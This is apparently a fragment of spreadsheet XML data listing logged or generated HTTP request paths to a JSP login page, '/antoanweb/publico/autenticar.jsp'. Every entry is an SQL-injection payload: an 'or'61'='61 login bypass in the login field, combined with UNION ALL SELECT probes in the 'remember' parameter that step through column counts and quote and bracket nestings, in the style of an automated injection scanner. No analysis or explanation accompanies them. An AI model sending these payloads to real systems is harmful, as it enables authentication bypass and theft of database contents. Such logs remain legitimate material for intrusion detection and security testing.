    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794#and"hjkm"="hjkm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575#and"wotk"="wotk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981,6981#and"kvfj"="kvfj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883,4883#and"mjdo"="mjdo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1183,1183,1183,1183,1183,1183,1183,1183,1183,1183,1183#and("ommx"like"ommx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8784,8784,8784,8784,8784,8784,8784,8784,8784,8784,8784,8784#and("palq"like"palq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6310,6310,6310,6310,6310,6310,6310,6310,6310,6310,6310,6310,6310#and("bjsd"like"bjsd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240#and("vhnb"like"vhnb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect778,778,778,778,778,778,778,778,778,778,778,778,778,778,778#and("ugli"like"ugli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170#and("zvbb"like"zvbb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487,5487#and("hqbw"like"hqbw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064,3064#and("awol"like"awol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056,1056#and("gcxl"like"gcxl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185#and("tesv"like"tesv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2080,2080,2080,2080,2080,2080,2080,2080,2080,2080,2080#and(("abpp"like"abpp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049,3049#and(("bkla"like"bkla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8364,8364,8364,8364,8364,8364,8364,8364,8364,8364,8364,8364,8364#and(("nuau"like"nuau&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337,1337#and(("mgma"like"mgma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9054,9054,9054,9054,9054,9054,9054,9054,9054,9054,9054,9054,9054,9054,9054#and(("bmjt"like"bmjt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect708,708,708,708,708,708,708,708,708,708,708,708,708,708,708,708#and(("rovd"like"rovd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509,6509#and(("wbzn"like"wbzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334#and(("bnyo"like"bnyo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844,8844#and(("aurn"like"aurn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473,473#and(("zekn"like"zekn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2727,2727,2727,2727,2727,2727,2727,2727,2727,2727,2727#and((("gdnj"like"gdnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317,1317#and((("owcw"like"owcw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235,3235#and((("hddc"like"hddc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5913,5913,5913,5913,5913,5913,5913,5913,5913,5913,5913,5913,5913,5913#and((("oluv"like"oluv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6427,6427,6427,6427,6427,6427,6427,6427,6427,6427,6427,6427,6427,6427,6427#and((("noxw"like"noxw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9399,9399,9399,9399,9399,9399,9399,9399,9399,9399,9399,9399,9399,9399,9399,9399#and((("ybzn"like"ybzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130,8130#and((("blnv"like"blnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665,3665#and((("jgku"like"jgku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074,2074#and((("qjxs"like"qjxs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210#and((("iexx"like"iexx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3084,3084,3084,3084,3084,3084,3084,3084,3084,3084,3084#and"ybpv"like"ybpv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1973,1973,1973,1973,1973,1973,1973,1973,1973,1973,1973,1973#and"xwof"like"xwof&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6319,6319,6319,6319,6319,6319,6319,6319,6319,6319,6319,6319,6319#and"ugga"like"ugga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886,1886#and"zzga"like"zzga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6309,6309,6309,6309,6309,6309,6309,6309,6309,6309,6309,6309,6309,6309,6309#and"vdus"like"vdus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect766,766,766,766,766,766,766,766,766,766,766,766,766,766,766,766#and"ktwc"like"ktwc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855,9855#and"dpjv"like"dpjv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133,5133#and"bszl"like"bszl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15#and"fdkk"like"fdkk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995,9995#and"kmab"like"kmab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect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#and(9774=9774&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(9134=9134&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(7489=7489&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(1663=1663&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(8549=8549&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(8136=8136&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(128=128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#and(2954=2954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#and(2532=2532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#and(5367=5367&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((5633=5633&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((1108=1108&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((7196=7196&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((4044=4044&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((9560=9560&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((6076=6076&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((2991=2991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#and((4060=4060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#and((836=836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#and((8276=8276&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((7374=7374&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((5077=5077&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((930=930&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((3131=3131&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((3462=3462&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((6215=6215&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((2511=2511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#and(((4956=4956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#and(((6076=6076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#and(((9605=9605&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect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#and('neal'='neal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('cyyl'='cyyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('wbmf'='wbmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('gadg'='gadg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('pzbx'='pzbx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('frjs'='frjs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('dbec'='dbec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#and('ooqq'='ooqq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#and('yhxm'='yhxm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#and('cwoc'='cwoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('iolm'='iolm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('jqao'='jqao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('lbib'='lbib&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('xfql'='xfql&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('sfsf'='sfsf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('mcnf'='mcnf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('smvh'='smvh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#and(('dprt'='dprt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#and(('nzgk'='nzgk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#and(('gsdt'='gsdt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('dwpm'='dwpm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('sztw'='sztw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('kjyi'='kjyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('thks'='thks&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('hlfe'='hlfe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('cynw'='cynw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('ghcf'='ghcf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#and((('zlco'='zlco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#and((('ebrc'='ebrc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#and((('judw'='judw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'xysb'='xysb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'sxhm'='sxhm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'soqz'='soqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bqgt'='bqgt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'eypr'='eypr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'bnxt'='bnxt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ujda'='ujda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#and'oonx'='oonx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#and'kqsi'='kqsi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#and'rlop'='rlop&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('fllg'like'fllg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('yitt'like'yitt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('tfzd'like'tfzd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('aurn'like'aurn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('kpxo'like'kpxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('jjwt'like'jjwt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('iakf'like'iakf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#and('vnlr'like'vnlr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#and('onfa'like'onfa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#and('gzcf'like'gzcf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('aijw'like'aijw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('poqu'like'poqu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('usvh'like'usvh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('abig'like'abig&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('oqxv'like'oqxv&amp;modo=entrar</t>
  </si>
  <si>
